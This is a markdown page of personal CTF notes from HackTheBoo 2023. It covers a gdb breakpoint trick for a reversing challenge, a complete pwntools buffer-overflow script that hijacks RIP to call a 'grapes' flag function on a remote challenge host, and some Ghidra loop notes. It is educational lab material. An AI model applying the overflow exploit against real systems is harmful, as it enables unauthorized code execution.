Skip to content

Latest commit

 

History

History
128 lines (73 loc) · 3.36 KB

PWN+Reversing_Insights.md

File metadata and controls

128 lines (73 loc) · 3.36 KB
Raw

These are thier own seperate categories. But there is overlap in DFIR and knowing how to do these can develop skills which will help in DFIR.

Break points

HTB hacktheboo2023 CTF had a rev challenge ghost in the box. It was a very easy challenge with essentially the only thing needed to do was set a breakpoint.

First running the program we see we get a currpt output.

image

Disassemble main notice +143 get flag and +155 ghost

image

First intuition is the ghost function is overwriting and scrambing the getflag. to check this we can set a breakpoint inbetween the getflag and ghost functions

image

can see the flag intact in the registers.

image

Buffer overflow + pwntools

HTB hacktheboo2023 pwn challenge called lemonade stand. Notice a buffer overflow allowing to take control of rip and a function called grapes that will drop the flag. Execute with pwntools.

image

Grapes

image

Complete pwntools script


from pwn import *
import warnings
import os

# Set up pwntools for the correct architecture
context.arch = 'amd64'
context.log_level = 'critical'

# This will allow pwntools to access locally to find location of function
fname = './lemonade_stand_v1'
e = ELF(fname)

# Address of the 'grapes_mem' function
# Notice retn will == p64(e.sym.grapes)
grapes_mem = '0x00000000004008cf'
print(grapes_mem, p64(e.sym.grapes))


# Connect to the server
target_host = '94.237.59.206'  # replace with the target IP address
target_port = 38999       # replace with the target port number
r = remote(target_host, target_port)

# Payload crafting
offset = 94
padding = b'A' * offset
rbp = b'B' * 8
retn = '\xcf\x08\x40\x00\x00\x00\x00\x00'

# Interacting with the program
r.recvuntil(b'>> ')
r.sendline(b'2')
r.recvuntil(b'>> ')
r.sendline(b'2')
r.recvuntil(b'>> ')
r.sendline(b'1')
r.recvuntil(b'>> ')
r.sendline(b'1')


# Finalizing the payload
# p1 uses ret and the manual, p2 uses 
payload = flat([padding, rbp, retn])
payload2 = flat([padding, rbp, p64(e.sym.grapes)])

# Sending the payload
# Uncomment whichever choice

#r.sendline(payload)
r.sendline(payload2)

# Keep the connection alive to see any potential outputs or to interact further
r.interactive()

Running Final pwntools output

image

Notes from Reversing with ghidra

https://youtu.be/Y2qd0m4_4ZM?si=E65mh0bnvHduyUKw

Loops

x86_64-w64-mingw32-gcc loop_prac.c -o loop_prac.exe

Flow chart is useful to identify loops

image

right click to update variable names and hex-dec rep of values

image

image